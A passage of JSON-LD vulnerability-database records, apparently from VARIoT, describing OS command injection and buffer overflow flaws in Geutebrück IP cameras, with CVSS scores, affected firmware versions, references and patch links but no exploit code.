            "model": "e2 series camera",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebr\u00fcck",
            "version": "1.12.0.25"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-04134"
          },
          {
            "db": "BID",
            "id": "106208"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-014624"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-19007"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:geutebrueck:g-cam%2fefd-2251_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebrueck:g-cam%2fewpc-2275_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-014624"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The vendor reported this issue.",
        "sources": [
          {
            "db": "BID",
            "id": "106208"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2018-19007",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2018-19007",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "MULTIPLE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 8.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 6.4,
                "id": "CNVD-2019-04134",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:M/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2018-19007",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2018-19007",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2018-19007",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2019-04134",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201812-657",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULMON",
                "id": "CVE-2018-19007",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-04134"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-19007"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-014624"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201812-657"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-19007"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "In Geutebrueck GmbH E2 Camera Series versions prior to 1.12.0.25 the DDNS configuration (in the Network Configuration panel) is vulnerable to an OS system command injection as root. The Geutebr\u00fcck E2 Camera Series is an E2 series webcam from Geutebr\u00fcck, Germany. A remote attacker can exploit this vulnerability to inject operating system commands with root privileges. Geutebr\u00fcck GmbH E2 Series IP Cameras are prone to an OS command-injection vulnerability",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-19007"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-014624"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-04134"
          },
          {
            "db": "BID",
            "id": "106208"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-19007"
          }
        ],
        "trust": 2.52
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-19007",
            "trust": 3.5
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-18-347-03",
            "trust": 2.8
          },
          {
            "db": "BID",
            "id": "106208",
            "trust": 2.6
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-014624",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-04134",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201812-657",
            "trust": 0.6
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-19007",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-04134"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-19007"
          },
          {
            "db": "BID",
            "id": "106208"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-014624"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201812-657"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-19007"
          }
        ]
      },
      "id": "VAR-201812-0470",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-04134"
          }
        ],
        "trust": 1.7
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          },
          {
            "category": [
              "camera device"
            ],
            "sub_category": "camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-04134"
          }
        ]
      },
      "last_update_date": "2025-01-30T19:51:02.593000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.guardzilla.com/"
          },
          {
            "title": "Geutebr\u00fcck E2 Camera Series operating system command injection vulnerability patch",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/153491"
          },
          {
            "title": "Geutebr\u00fcck E2 Camera Series Fixes for operating system command injection vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=87899"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-04134"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-014624"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201812-657"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-014624"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-19007"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.9,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-347-03"
          },
          {
            "trust": 2.4,
            "url": "http://www.securityfocus.com/bid/106208"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-19007"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-19007"
          },
          {
            "trust": 0.3,
            "url": "https://www.geutebrueck.com/"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/78.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-04134"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-19007"
          },
          {
            "db": "BID",
            "id": "106208"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-014624"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201812-657"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-19007"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-04134"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-19007"
          },
          {
            "db": "BID",
            "id": "106208"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-014624"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201812-657"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-19007"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-02-14T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-04134"
          },
          {
            "date": "2018-12-14T00:00:00",
            "db": "VULMON",
            "id": "CVE-2018-19007"
          },
          {
            "date": "2018-12-14T00:00:00",
            "db": "BID",
            "id": "106208"
          },
          {
            "date": "2019-03-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-014624"
          },
          {
            "date": "2018-12-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201812-657"
          },
          {
            "date": "2018-12-14T20:29:00.297000",
            "db": "NVD",
            "id": "CVE-2018-19007"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-02-14T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-04134"
          },
          {
            "date": "2019-10-09T00:00:00",
            "db": "VULMON",
            "id": "CVE-2018-19007"
          },
          {
            "date": "2018-12-14T00:00:00",
            "db": "BID",
            "id": "106208"
          },
          {
            "date": "2019-03-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-014624"
          },
          {
            "date": "2019-10-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201812-657"
          },
          {
            "date": "2024-11-21T03:57:09.213000",
            "db": "NVD",
            "id": "CVE-2018-19007"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201812-657"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "OS command injection vulnerability in the Geutebrueck GmbH E2 Camera Series",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-014624"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system command injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201812-657"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202109-0598

    Vulnerability from variot - Updated: 2025-01-30 19:32

    Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to a stack-based buffer overflow condition in the counter parameter which may allow an attacker to remotely execute arbitrary code. The following multiple vulnerabilities exist in the G-Cam E2 and G-Code products provided by GEUTEBRUCK: * Lack of authentication for important features (CWE-306) - CVE-2021-33543; * Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554; * Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549. The expected impact depends on each vulnerability. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202109-0598",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * firmware    1.12.13.2    1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* een-20xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* efd-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ethc-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-cam"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* eec-2xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "works with the above firmware  s  e2 series camera models   encoders"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ebc-21xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-code"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "( multiple products )"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ewpc-22xx"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33545"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2092"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-33545",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-33545",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-33545",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2021-002023",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-33545",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-33545",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2021-002023",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-975",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202107-2092",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-33545",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-33545"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
